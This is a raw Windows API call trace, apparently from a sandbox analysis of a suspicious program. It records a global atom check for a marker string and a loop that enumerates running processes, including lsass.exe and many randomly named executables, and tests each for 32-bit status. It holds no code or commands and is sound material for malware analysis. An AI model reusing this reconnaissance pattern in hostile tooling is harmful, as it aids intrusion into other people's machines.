	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetLastError () returned 0x5
	[0096.688] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.688] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0096.688] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.688] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0096.688] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0096.688] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0096.689] CloseHandle (hObject=0x248) returned 1
	[0096.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0096.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fd28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0096.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0096.689] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.689] CloseHandle (hObject=0x248) returned 1
	[0096.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65ad08, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0096.689] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.690] CloseHandle (hObject=0x248) returned 1
	[0096.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16638) returned 0xc0000004
	[0096.741] VirtualAlloc (lpAddress=0x0, dwSize=0x16738, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0096.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x16738, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0096.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0096.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fd10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0096.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0096.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0096.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0096.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0096.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fe90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0096.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0096.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0096.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0096.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0096.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65ad08, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0096.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0096.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0096.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0096.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0096.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0096.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0096.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0096.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0096.748] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.748] CloseHandle (hObject=0x248) returned 1
	[0096.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fd28, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0096.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fea8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0096.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x658f08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0096.749] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.749] CloseHandle (hObject=0x248) returned 1
	[0096.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x658ea8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0096.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0096.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0096.750] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.750] CloseHandle (hObject=0x248) returned 1
	[0096.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fe90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0096.750] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.750] CloseHandle (hObject=0x248) returned 1
	[0096.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0096.750] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.750] CloseHandle (hObject=0x248) returned 1
	[0096.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fe90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0096.751] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.751] CloseHandle (hObject=0x248) returned 1
	[0096.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x6590e8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0096.751] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.751] CloseHandle (hObject=0x248) returned 1
	[0096.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0096.751] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.751] CloseHandle (hObject=0x248) returned 1
	[0096.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0096.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0096.752] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.752] CloseHandle (hObject=0x248) returned 1
	[0096.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0096.752] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.752] CloseHandle (hObject=0x248) returned 1
	[0096.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0096.752] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.752] CloseHandle (hObject=0x248) returned 1
	[0096.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x658f88, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0096.753] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.753] CloseHandle (hObject=0x248) returned 1
	[0096.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x658e68, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0096.753] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.753] CloseHandle (hObject=0x248) returned 1
	[0096.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65ac68, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0096.753] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.753] CloseHandle (hObject=0x248) returned 1
	[0096.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x658ee8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0096.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0096.754] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.754] CloseHandle (hObject=0x248) returned 1
	[0096.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658970, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0096.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0096.754] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.754] CloseHandle (hObject=0x248) returned 1
	[0096.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x658d48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0096.754] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.754] CloseHandle (hObject=0x248) returned 1
	[0096.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0096.755] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.755] CloseHandle (hObject=0x248) returned 1
	[0096.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0096.755] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.755] CloseHandle (hObject=0x248) returned 1
	[0096.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x658f08, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0096.755] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.755] CloseHandle (hObject=0x248) returned 1
	[0096.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x658d28, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0096.756] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.756] CloseHandle (hObject=0x248) returned 1
	[0096.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0096.756] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.756] CloseHandle (hObject=0x248) returned 1
	[0096.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fe90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0096.756] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.756] CloseHandle (hObject=0x248) returned 1
	[0096.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658c68, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0096.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0096.757] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.757] CloseHandle (hObject=0x248) returned 1
